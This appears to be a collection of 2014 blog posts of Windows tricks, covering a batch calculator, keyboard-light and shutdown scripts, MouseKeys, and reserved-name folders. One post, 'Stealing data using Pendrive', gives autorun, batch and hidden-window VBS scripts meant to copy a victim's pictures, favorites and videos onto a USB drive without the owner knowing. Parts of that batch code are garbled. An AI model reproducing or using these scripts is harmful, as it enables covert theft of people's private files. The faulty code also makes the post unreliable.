Wednesday, 26 March 2014

Facebook unique ID

Find your unique facebook id:
https://graph.facebook.com/pinnamaneni.chowdary
replace pinnamaneni.chowdary by your own


ctrl+shift+k
and then enter the below code


javascript:Chat.openTab(100002057574987)





Sunday, 9 March 2014

Stealing data using Pendrive

Copy Data from other computers by using USB or Pendrive.

We are often curious to know about the Data and Files which is in others Computer but we are not allowed to do so due to restrictions by the Computer owner or of some other Reason.

This Trick could prove to be very helpful and it would Copy and Steal all the Data without the Confirmation and Knowing of Computer Owner.

Just follow these simple Steps :

1. Open Notepad.

Copy and Paste the following Code into Notepad :
[autorun]
icon=drive.ico
open=launch.bat
action=Click OK to Run
shell\open\command=launch.bat

Save this file as autorun.inf

2. Open New Notepad again.

Copy and Paste the following Code :
@echo off
:: variables
/min
SET odrive=%odrive:~0,2%
set backupcmd=xcopy /s /c /d /e /h /i /r /y
echo off
%backupcmd% "%USERPROFILE%\pictures" "%drive%\Data\My pics"
%backupcmd% "%USERPROFILE%\Favorites" "%drive%\Data\Favorites"
%backupcmd% "%USERPROFILE%\videos" "%drive%\Data\vids"
@echo off
cls

Save this file as File.bat

3. Open Notepad again.

Copy and Paste the following Code :

CreateObject("Wscript.Shell").
Run """" & WScript.Arguments(0) & """", 0, False

Save this file as Invisible.vbs

4. Now again open Notepad.
Now Copy and Paste the following Code :

wscript.exe \invisible.vbs file.bat

Save this as Launch.bat.

Now Copy and Paste all the four (4) files created in the above steps to the USB or Pendrive.
Create a folder named “Data” where the Stolen contents would be Copied automatically.
Now it is done. The USB or Pendrive is ready to Steal the Secret Data or Files.

Friday, 7 March 2014

Create your own calculator

Open a notepad (or any other text editor) file and paste the following code in it:
Code:
@ECHO OFF
color 2a
title My Calculator
pause
ECHO ---------------------------------------- -------
ECHO * = MULTIPLY
ECHO + = ADD
ECHO - = SUBTRACT
ECHO / =DIVIDE
ECHO ---------------------------------------- -------
pause

:loop
echo.
echo ---------------------------------------- -------
SET /p UDefine=
SET /a UDefine=%UDefine%
ECHO =
ECHO %UDefine%
ECHO.

Save the notepad file with a name say “calc.bat” or "Anynameyouwant.bat" where .bat is extension for batch files. Now click on the batch file icon and there opens your own calculator in command prompt window.

Saturday, 1 March 2014

Keyboard lighting Trick

Write the below code in the notepad and save it with .vbs extension and run it then your keyboard lights will dance...

Set wshShell =wscript.CreateObject("WScript.Shell")
do
wscript.sleep 100
wshshell.sendkeys "{CAPSLOCK}"
wshshell.sendkeys "{NUMLOCK}"
wshshell.sendkeys "{SCROLLLOCK}"
loop



{save it as .vbs}

Sunday, 23 February 2014

Shutdown pc through run

Go to run and type          shutdown -s -t 00    and see magic
For setting time period give the seconds value in the place of 00
Suppose i want to shutdown after 1min then i will give 60 in the place of 00

Thursday, 20 February 2014

Use keyboard as mouse

If your mouse is not working and you don't wish to wait till you get a new mouse, you would definitely like to know how you can use your keyboard as your mouse. It is easy to use your mouse as keyboard in Windows using the On Screen Keyboard utility, but it is also possible to do the reverse.

Keyboard Mouse

All you need to do is:

Windows XP Users:-
Go to Control Panel.
Then click on Switch to Classic View.
Then Click on Accessibility Options.
Then Click on the Mouse Tab.
Select Use MouseKeys.
Click on OK.
Then activate NumberLock (by pressing the NumLk key).
You should hear a beep sound.
Now you can control the mouse pointer using the arrow keys on the numeric keypad.
use keyboard as mouse


Windows 8, Windows 7 and Vista Users:

Open Ease of Access Center by clicking the Start button , clicking Control Panel, clicking Ease of Access, and then clicking Ease of Access Center.
Click Make the mouse easier to use.
Under Control the mouse with the keyboard, select the Turn on Mouse Keys check box.

You can also increase the acceleration and speed of your mouse movements according to your needs.

You can alternately press the Alt+Shift+Num Lock combination to instantly activate the mouse keys.


Laptop Keyboard Mouse

For laptops, this will only work if your laptop keyboard has a numeric keypad or alternative keys which you can enable by pressing the Number Lock Key or the Function key.

On my laptop, number 6 key of the numeric keypad moves the mouse pointer left, number 4 key moves the mouse pointer right, number 2 key moves it down, number 8 key moves the mouse pointer up, number 5 and + key serve as right click while the number 0 key works as left click.

Monday, 17 February 2014

Making of Unrenamable and Undeletable Folders

Have you ever wondered how you can make a folder which neither can be deleted nor be renamed. Well, if you have, then you have come to the right place. With this trick, you will be able to create folders in Windows which cannot be renamed or deleted.

Basic Concept
The basic concept behind this trick is the use of Keywords. Keywords are reserved words in any programming language that cannot be used as names of variables. Windows also uses certain keywords in its programming. Some of them are con, aux, lpt1, lpt2, lpt3, lpt4, lpt5, lpt6, lpt7, lpt8 and lpt9.

Make Undeletable and unrenamable folders

A Test
To test this concept, make a new folder in Windows and try to give it a name same as any keyword suggested above.

Result
Windows will not rename your folder to any of the keyword given above.

Trick
So the question arises, how can we make a folder with a keyword as its name? The solution to this problem is included in Windows itself. As we know that Windows has evolved from D.O.S.(Disk Operating System), its commands can be used in Windows. You can use D.O.S. Programming in Windows to create a folder with a keyword as its name using the steps given below:-

Click on Start.
Click on Run. Type in "cmd" without quotes.
In the Command Prompt Window that opens, type the name of the drive you wish to create your folder in the format <drive-name>: and press Enter. e.g. If you wish to create the undeletable folder in D drive, type "D:" without the quotes. Note that the folder cannot be created in the root of C:/ drive (if C: is your system drive).
Type this command- "md con\" or "md lpt1\" without the quotes and press Enter. You can choose any of the keywords given above as the name of your folder.

Now Windows will create an undeletable, unrenamable folder in the drive you entered in Step 3. However the folder can be renamed to another keyword using Windows Explorer.

Deleting the Folder

Although it is not possible to manually delete the folder, you can delete the folder by typing "rd con\" or "rd lpt1\" in Step 4 instead of "md con\" or "md lpt1\".

Windows Compatibility: This works on Windows XP, Windows Vista, Windows 7 and Windows 8.

Try it yourself to create one such folder which can neither be deleted nor be renamed.